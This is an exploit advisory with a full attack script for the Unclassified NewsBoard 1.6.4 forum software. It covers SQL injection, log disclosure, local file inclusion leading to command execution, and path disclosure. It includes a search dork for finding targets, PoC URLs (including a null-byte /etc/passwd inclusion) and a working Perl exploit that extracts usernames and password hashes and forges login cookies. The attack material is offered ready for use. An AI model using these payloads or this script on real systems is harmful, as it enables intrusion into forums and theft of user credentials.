# Author_ girex # Homepage_ girex.altervista.org # Date_ 31/05/2009 # CMS_ Unclassified NewsBoard 1.6.4 (and maybe lower) # Dork_ "This board is powered by the Unclassified NewsBoard software, 1.6.4" # Multiple remote vulnerabilities # 1) Remote SQL Injection (php.ini regardless) # 2) Logs File Disclosure (register_globals = On) # 3) Local File Inclusion / Remote Command Execution (register_globals = On / magic_quotes_gpc = Off) # 4) Full Path Disclosure ################################################################################# # 1) Remote SQL Injection # Works regardless of php.ini settings # File: /unb_lib/common.lib.php - Lines: 78-103 if (get_magic_quotes_gpc()) { #$mq_old = array('\\\'', '\\"', '\\\\', '\\0'); #$mq_new = array('\'', '"', '\\', ''); foreach ($_GET as $key => $value) { if (is_string($_GET[$key])) $_GET[$key] = stripslashes($value); } foreach ($_POST as $key => $value) { #if (!is_array($_POST[$key])) $_POST[$key] = str_replace($mq_old, $mq_new, $value); if (is_string($_POST[$key])) $_POST[$key] = stripslashes($value); } foreach ($_REQUEST as $key => $value) { if (is_string($_REQUEST[$key])) $_REQUEST[$key] = stripslashes($value); } foreach ($_COOKIE as $key => $value) { if (is_string($_COOKIE[$key])) $_COOKIE[$key] = stripslashes($value); } foreach ($_FILES as $key => $value) { $_FILES[$key]['name'] = stripslashes($value['name']); } } # If magic_quotes_gpc are set to On it stripslash all input variables, so we don't need mq = off. # Now the vars are sanizated for SQL queries with UnbDbEncode function in database.lib.php # File: /unb_lib/database.lib.php - Lines: 805-825 function UnbDbEncode($str, $forLIKE = false) { // Clean parameters $str = strval($str); $str = str_replace('\\', '\\\\', $str); <== escape backslash $str = str_replace('\'', '\\\'', $str); <== escape quote #$str = str_replace('\'', '\'\'', $str); $str = str_replace('"', '\\"', $str); $str = str_replace("\n", '\\n', $str); $str = str_replace("\r", '\\r', $str); $str = str_replace("\t", '\\t', $str); if ($forLIKE) { $str = str_replace('\\', '\\\\', $str); <== this is wrong, delete the escaping of the quote for example $str = str_replace('%', '\\%', $str); $str = str_replace('_', '\\_', $str); } return $str; } # As you can see, if $forLIKE is set to true the effect of the escaping is vanificated # ' => \' => (if $forLIKE == true) => \\' # File: /unb_lib/search.inc.php - lines: if ($_REQUEST['InSubject'] || $_REQUEST['InMessage']) { $highlight = array(); $words = explode_quoted(' ', $_REQUEST['Query']); <== ... foreach ($words as $word) { if ($word != '') { ... // case-insensitive search $in_subject .= '(p.Subject LIKE \'%' . UnbDbEncode($word, true) . '%\' OR ' . <== 't.Desc LIKE \'%' . UnbDbEncode($word, true) . '%\' AND p.Date = t.Date)'; ... $in_message .= '(p.Msg LIKE \'%' . UnbDbEncode($word, true) . '%\')'; <== vuln sanizating // this doesn't work: ... $query .= '('; if ($_REQUEST['InSubject']) $query .= $in_subject; if ($_REQUEST['InSubject'] && $_REQUEST['InMessage']) $query .= ($not ? ' AND ' : ' OR '); if ($_REQUEST['InMessage']) $query .= $in_message; $query .= ')'; ...... if (!$error) { $record = $UNB['Db']->FastQuery( <== vuln query /*table*/ array( array('', 'Posts', 'p', ''), array('LEFT', 'Threads', 't', 'p.Thread = t.ID')), /*fields*/ $_REQUEST['ResultView'] == 1 ? 't.ID, t.Forum' : 'p.ID, t.ID, t.Forum', /*where*/ $query, /*order*/ '', /*limit*/ '', /*group*/ $_REQUEST['ResultView'] == 1 ? 't.ID' : ''); # $_REQUEST['Query'] var is 'sanizated' with the bugged function UnbDbDecode so we can manipulate the query. # PoC: [host]/[path]/forum.php?req=search&Query=xxx'))OR/**/1=1%23&ResultView=2&InMessage=1&Sort=2&Forum=0 ################################################################################# # 2) Logs file disclosure # Need register_globals = On # File: /unb_lib/common.lib.php - lines: 127-135 // unregister_globals :) for more security (except for install/import scripts) if (ini_get('register_globals') && !$UNB['Installing']) { if (sizeof($_SESSION)) foreach (array_keys($_SESSION) as $key) unset($$key); if (sizeof($_GET)) foreach (array_keys($_GET) as $key) unset($$key); if (sizeof($_POST)) foreach (array_keys($_POST) as $key) unset($$key); if (sizeof($_COOKIE)) foreach (array_keys($_COOKIE) as $key) unset($$key); if (sizeof($_SERVER)) foreach (array_keys($_SERVER) as $key) unset($$key); } # This is simply bypassable using and defining global vars via GLOBALS array # like forum.php?GLOBALS[var]=value # Now let's see rss.inc.php # File: /unb_lib/rss.inc.php - lines: 69-77 $type = $_REQUEST['type']; ... if ($type == 1) $filename = strtolower(str_replace('.', '', $format)) . '.' . $forumid . '.xml'; if ($type == 2) $filename = strtolower(str_replace('.', '', $format)) . '.allposts.xml'; $filename = dirname(__FILE__) . '/rsscache/' . $filename; $rss = new UniversalFeedCreator(); if ($cache_time) $rss->useCached($format, $filename, $cache_time); <== vuln function # If type is set for example to 3, we can define $filename # File: /unb_lib/feedcreator.lib.php function useCached($filename="", $timeout=3600) { $this->_timeout = $timeout; if ($filename=="") { $filename = $this->_generateFilename(); } if (file_exists($filename) AND (time()-filemtime($filename) < $timeout)) { $this->_redirect($filename); <== vuln function } } # NOTE: the file as you can see must be edited in the last hour ... function _redirect($filename) { Header("Content-Type: ".$this->contentType."; charset=".$this->encoding."; filename=".basename($filename)); Header("Content-Disposition: inline; filename=".basename($filename)); readfile($filename, "r"); <== here local file disclosure die(); } # NOTE: the file as you can see must be edited in the last hour # So it is only usefull to see log's files. (we can't access them directly couse use of .htaccess) # PoC: [host]/[path]/forum.php?req=rss&type=3&forum=1&GLOBALS[filename]=../logs/board-yyyy-mm-dd.log # Where yyyy-mm-gg are the current year month and day. ################################################################################# # 3) Local file inclusion / Remote command execution # Need register_globals = On and magic_quotes_gpc = Off # File: /unb_lib/ute.runtime.lib.php - lines: function UteShowAll() { global $UTE; if (!isset($UTE['__tplCollection']) || !is_array($UTE['__tplCollection'])) return; foreach ($UTE['__tplCollection'] as $tpl) { UteShow($tpl['file'], $tpl['params']); } $UTE['__tplCollection'] = null; } # UteShowAll is called to include local templates.. # But $UTE array is not properly inizialitizated.. # So $UTE['__tplCollection'] array is writable via GLOBALS trick so let's see UteShow function... function UteShow($file, &$params) { global $UTE; $sourceFile = $UTE['__sourcePath'] . '/' . $file; $cacheFile = $UTE['__cachePath'] . '/' . $file . '.php'; <== vulnerable variable ... if ($UTE['__haltOnFileError'] && !file_exists($cacheFile) && !is_readable($cacheFile)) die('UTE error: cannot include template "' . $file . '", does not exist or is not readable
'); $ret = include($cacheFile); <== vulnerable inclusion if (!$ret) die('UTE error: error including template "' . $file . '"
'); ... return true; } # So there is a local file inclusion working with rg = on and mq = off couse use of nullbyte # PoC: [host]/[path]/forum.php?GLOBALS[UTE][__tplCollection][a][file]=../../../../../../../../../../../../etc/passwd%00 # NOTE: you can obatin a Remote Command Execution: - injecting php code in log's file and including it. - uploading an attachment in your topic with malicious code. - uploading an avatar with malicios code in exif data. ################################################################################# # 4) Full path disclosure # Finally to get a simply full path disclosure make this request: # /[host]/[path]/extra/import/import_wbb1.php ################################################################################# ########################## Remote SQL Injection Exploit ######################### ################################################################################# #!/usr/bin/perl # Unclassified NewsBoard 1.6.4 Remote SQL Injection Exploit # Coded by girex use LWP::UserAgent; use HTTP::Cookies; if(not defined $ARGV[0]) { print "\nusage: perl $0 \n"; print "example: perl $0 localhost /unb/\n\n"; exit; } my $lwp = new LWP::UserAgent; my $cookie_jar = new HTTP::Cookies; $lwp->cookie_jar($cookie_jar); $lwp->default_header('Accept-Language: en-us,en;q=0.5'); $lwp->agent('User-Agent: Mozilla/5.0 (X11; U; Linux; it; rv: Firefox/3.0.10'); my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; $target .= $ARGV[1] unless not defined $ARGV[1]; $target .= '/' unless $target =~ /\/$/; banner(); my $id = '1'; # change if need my $default_prefix = 'unb1'; # change if need my $abs_path = get_abs_path(); # using path disclosure bug my $cookie_prefix = get_cookie_prefix(); # getting cookie prefix and session print "[+] Path disclosure: $abs_path\n" if defined $abs_path; $injection = "-1) AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,table_name,". "12,13,14,15,16,17,18,19 FROM information_schema.tables WHERE table_name LIKE '%_GroupMembers' LIMIT 0,1#"; $table_name = make_inj($injection); if(defined $table_name and $table_name =~ /(\w+)_GroupMembers/) { $prefix = $1; print "[+] Found table prefix via information schema: ${prefix}_\n\n"; } else { $prefix = $deafult_prefix; } # Change this query if need $injection = "-1) AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat(Name,0x3a,Password),". "12,13,14,15,16,17,18,19 FROM ${prefix}_Users WHERE ID=${id} OR 1 LIMIT 0,1#"; $login = make_inj($injection); if(defined $login) { ($username, $hash) = split(':', $login,2); print "[+] Username: $username\n[+] Hash: $hash\n\n"; if(length($hash) == 32) { $cookie = "UnbUser-${cookie_prefix}=${id}+${hash}"; print "[+] Password is hashed in md5 use this cookie to authenticate:\n"; print "[+] Cookie: $cookie\n\n"; } elsif(length($hash) == 34) { print "[-] Hash retrieved is NOT a md5, so can't retrieve cookie to authenticate.\n"; print "[-] See the source to know how to bruteforce it\n\n"; } else { $password = $1 if $hash =~ /\{(.+)\}/; print "[+] Password is in plain-text use $username and $password to login!\n\n"; } } else { print "[-] Unable to retrieve user's hash, probably wrong prefix\n\n"; } sub get_abs_path() { my $res = $lwp->get($target.'extra/import/import_wbb1.php'); if($res->is_error) { return undef; } if($res->content =~ /in (.*)extra\/import\/import_wbb1.php<\/b> on line/) { return $1; } return $undef; } sub get_cookie_prefix() { my $res = $lwp->get($target.'forum.php'); if($res->is_error) { print "[-] Unable to request ${target}forum.php\n"; print "[-] ". $res->status_line."\n\n"; exit; } if($res->as_string =~ /Set-Cookie: unb(\d+)sess=(\w{32})/) { $v = $1; $val = $2; } return "unb${v}"; } sub make_inj() { my $inj = hex_str(shift); my $final_inj = "1')AND(1=2))UNION/**/SELECT/**/$inj,-1111,-1111%23"; my $res = $lwp->get($target."forum.php?req=search&Query=${final_inj}&ResultView=2&InMessage=1&Forum=0&set_lang=en"); if($res->is_error) { print "[-] ". $res->status_line . "\n\n"; exit; } if($res->content =~ /Subject:<\/small> (.+)<\/b>/) { return $1; } open(DEBUG, '>', 'debug.htm'); print DEBUG $res->content; close(DEBUG); return undef; } sub hex_str() { return '0x'. unpack("H*", shift); } sub banner() { print "\n[+] Unclassified NewsBoard 1.6.4 Remote SQL Injection Exploit\n"; print "[+] Coded by girex\n\n"; }